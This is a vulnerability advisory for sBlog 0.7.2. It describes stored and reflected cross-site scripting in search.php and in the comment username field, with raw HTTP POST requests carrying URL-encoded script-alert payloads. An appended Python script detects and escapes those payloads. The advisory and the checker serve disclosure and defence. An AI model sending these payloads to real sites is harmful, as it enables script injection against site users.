sBlog 0.7.2 <== Multiple Cross-Site Scripting Vulnerability

===================================
Information of Software:

Software: sBlog 0.7.2
Site: http://servous.se/
Description: sBlog is a simple, new PHP blog. It is very simple and is used by PHP newcomers.
===================================

Bug:

1) Cross-Site Scripting Vulnerability in the page search.php

sBlog contains a flaw that allows a remote cross-site scripting attack. The vulnerability is found in the search method: the user can modify the GET function's input and insert the XSS code.

- HTTP Normal POST Request http://[target]/[path]/search.php

POST /[path]/search.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/[path]/search.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

keyword=casa

- End of Normal POST Request

But we can modify the POST request in this way:

[....]
Content-Type: application/x-www-form-urlencoded
Content-Length: 58

keyword=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E
[....]

---------------------------------------------------------
PoC for the first vulnerability: you can insert the key for executing an XSS attack into the search textbox.

###########################################

2) Cross-Site Scripting Vulnerability in the name of the user posting a comment

This vulnerability can be exploited by malicious people to conduct script insertion attacks. Input passed to the "title" field when editing submitted articles, and reportedly also when commenting on articles, isn't properly sanitised before being used. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user's browser session in the context of an affected site when the malicious user data is viewed.

- HTTP Normal POST Request http://[target]/[path]/comments_do.php

POST [path]/comments_do.php HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/[path]/comments.php?id=news_id
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

blog_id=id_of_news&username=Test&email=&homepage=&comment=Test

But we can modify the variable &username in the POST request in this way:

[....]
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

blog_id=3&username=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&email=&homepage=&comment=test
[....]

---------------------------------------------------------
PoC for the second vulnerability: you can insert XSS code, or HTML code, into the name textbox of the user comment to execute a cross-site scripting attack.

===================================
Credit:

Author: Kiki
e-mail: federico.sana@alice.it
web page: http://kiki91.altervista.org and http://blackzero.netsons.org
===================================
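As an added defender-side check, not part of the advisory or of sBlog: the script below decodes the two form bodies quoted above, flags the fields (keyword, username) whose decoded value carries markup, and shows the HTML-encoded form that search.php and comments_do.php would need to emit instead of the raw value. The field-to-script mapping and the markup pattern are assumptions for this example.

```python
import html
import re
from urllib.parse import parse_qs

# Assumed mapping of each sBlog script to the form fields it reflects into HTML
# (the advisory names keyword and username; the other comment fields are added
# on the assumption that they are rendered too).
WATCHED_FIELDS = {
    "search.php": ("keyword",),
    "comments_do.php": ("username", "email", "homepage", "comment"),
}

# Tag openers, javascript: URLs and inline event handlers: none of these belong
# in a plain search term or a commenter's display name.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)


def decode_body(body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into {field: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def find_markup_fields(script: str, body: str) -> list:
    """Return the watched fields of `script` whose decoded value contains markup."""
    params = decode_body(body)
    return [f for f in WATCHED_FIELDS.get(script, ()) if MARKUP_RE.search(params.get(f, ""))]


def render_safe(value: str) -> str:
    """The output encoding a page must apply before reflecting user input into HTML."""
    return html.escape(value, quote=True)


# Constructed from the request bodies quoted in the advisory.
SEARCH_BENIGN = "keyword=casa"
SEARCH_XSS = "keyword=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E"
COMMENT_XSS = ("blog_id=3&username=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E"
               "&email=&homepage=&comment=test")

if __name__ == "__main__":
    for script, body in (("search.php", SEARCH_BENIGN),
                         ("search.php", SEARCH_XSS),
                         ("comments_do.php", COMMENT_XSS)):
        hits = find_markup_fields(script, body)
        print(f"{script}: flagged fields {hits}")
        for field in hits:
            print("  encoded for output:", render_safe(decode_body(body)[field]))
```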